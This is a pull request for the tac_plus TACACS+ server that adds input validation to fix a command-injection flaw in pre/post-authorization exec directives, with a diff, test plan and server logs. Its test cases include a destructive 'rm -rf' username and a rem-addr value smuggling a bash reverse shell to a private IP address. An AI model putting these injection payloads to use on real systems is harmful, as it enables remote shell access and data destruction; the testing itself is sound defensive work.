### PR TITLE
Author data validation

### DIFF
--- a/tacacs-F4.0.4.28/programs.c
+++ b/tacacs-F4.0.4.28/programs.c
@@ -70,14 +70,14 @@ lookup(char *sym, struct author_data *data)
     static char buf[5];
 
     if (STREQ(sym, "user")) {
-       if (is_valid_name(data->id->username)) {
-          return(tac_strdup(data->id->username));
-       }
+        if (is_valid_name(data->id->username)) {
+           return(tac_strdup(data->id->username));
+        }
     }
     if (STREQ(sym, "name")) {
-       if (is_valid_name(data->id->NAS_name)) {
-          return(tac_strdup(data->id->username));
-       }
+        if (is_valid_name(data->id->NAS_name)) {
+           return(tac_strdup(data->id->username));
+        }
     }
     if (STREQ(sym, "ip")) {
 	return(tac_strdup(data->id->NAS_ip));
@@ -86,9 +86,9 @@ lookup(char *sym, struct author_data *data)
 	return(tac_strdup(data->id->NAS_port));
     }
     if (STREQ(sym, "address")) {
-       if (is_valid_name(data->id->NAC_address)) {
-          return(tac_strdup(data->id->NAC_address));
-       }
+        if (is_valid_name(data->id->NAC_address)) {
+           return(tac_strdup(data->id->NAC_address));
+        }
     }
     if (STREQ(sym, "priv")) {
 	snprintf(buf, sizeof(buf), "%d", data->id->priv_lvl);


### PR DESCRIPTION
this diff fixes a RCE vulnerability within the tacplus code. Fields such as  rem-addr field inside a tacacs authorization packet can be injected without any validation from the PRE and POST authorization directive to exec() under certain conditions a) the user config should have a before authorization directive, and a service should be specified.

This fix treats username/NAC address fields to be a alphanumeric strings and validates them as such. Some fields such as NAC address may contain some special characters since its values could IP addresses, hostnames, or vendor specific strings such as Local/Infinode.
This fix will return value "unknown" from the lookup functions if the fields being validated fail validation. The treatment of this string is left to the remote system being called by tac_plus (to accept/reject)


Added some additional validations for other fields.

test plan 

| ./configure --without-libwrap
| make
| ./tac_plus -G -d 20 -l /dev/stdout -p 2046 -C tac_plus.cfg

sample config file
```
❯ cat tac_plus.cfg
key = fooman

accounting file = /tmp/acct.log

user = DEFAULT {
before authorization "/home/sahuja4/tac_plus/sample.sh -- '$user' '$address'"
    service = exec {
        default attribute = permit
    }
}
```

The sample.sh file dumps all input args into a tmp file
```
❯ cat ../sample.sh
#!/bin/bash
echo $@ >> /tmp/vars.txt
```

What we want to check is that any arg inside the author_data struct that we cannot validate is set to unknown, and is passed on to the binary specified in pre/post authorization

We have 3 cases which we want to test 
Case 1: Invalid username
> ./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run"

Case 2: Invalid rem-addr
> ./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run" --rem-addr "asd';bash -i >& /dev/tcp/192.168.1.18/1337 0>&1 #"

Case 3: Correctly formatted username and rem-addr
> ./debug -- --mode authz --username sahuja4 --cmd "show run"

The following output was produced when run against the tacacs client invoked against the 3 cases

```
❯ cat /tmp/vars.txt
-- unknown devvm2737   <- case 1
-- sahuja4 unknown     <- case 2
-- sahuja4 devvm2737   <- case 3
```

Here is the server output when ran against the client 
```
Tue Oct  3 15:33:28 2023 [2213901]: Reading config
Tue Oct  3 15:33:28 2023 [2213901]: Version F4.0.4.28-7fb Initialized 1
Tue Oct  3 15:33:28 2023 [2213901]: tac_plus server F4.0.4.28-7fb starting
Tue Oct  3 15:33:28 2023 [2213901]: socket FD 4 AF 10
Tue Oct  3 15:33:28 2023 [2213901]: Error Cannot write pid to /var/run/tac_plus.pid.2046 Permission denied
Tue Oct  3 15:33:28 2023 [2213901]: uid=189399 euid=189399 gid=100 egid=100 s=8000912
Tue Oct  3 15:33:32 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436 for ::1, procs 1, procs for client 1
============================== case 1============================================
Tue Oct  3 15:33:32 2023 [2214436]: Authenticating ACLs for user 'DEFAULT' instead of 'rm -rf /home/sahuja4/fbsource/fbcode'
Tue Oct  3 15:33:32 2023 [2214436]: invalid character=[ ]
Tue Oct  3 15:33:32 2023 [2214436]: authorization query for 'rm -rf /home/sahuja4/fbsource/fbcode' tty0 from ::1 accepted
Tue Oct  3 15:33:32 2023 [2214436]: exit status=0
Tue Oct  3 15:33:32 2023 [2213901]: Clening up session for pid 2214436
Tue Oct  3 15:33:32 2023 [2213901]: Pid 2214436 Lowered Count for ::1 to 0
Tue Oct  3 15:34:52 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734 for ::1, procs 1, procs for client 1
Tue Oct  3 15:34:52 2023 [2234734]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
============================== case 2============================================
Tue Oct  3 15:34:52 2023 [2234734]: invalid character=[']
Tue Oct  3 15:34:52 2023 [2234734]: authorization query for 'sahuja4' tty0 from ::1 accepted <- case 2
Tue Oct  3 15:34:52 2023 [2234734]: exit status=0
Tue Oct  3 15:34:52 2023 [2213901]: Clening up session for pid 2234734
Tue Oct  3 15:34:52 2023 [2213901]: Pid 2234734 Lowered Count for ::1 to 0
Tue Oct  3 15:36:13 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661 for ::1, procs 1, procs for client 1
============================== case 3============================================
Tue Oct  3 15:36:13 2023 [2249661]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
Tue Oct  3 15:36:13 2023 [2249661]: authorization query for 'sahuja4' tty0 from ::1 accepted
Tue Oct  3 15:36:13 2023 [2249661]: exit status=0
Tue Oct  3 15:36:13 2023 [2213901]: Clening up session for pid 2249661
Tue Oct  3 15:36:13 2023 [2213901]: Pid 2249661 Lowered Count for ::1 to 0
```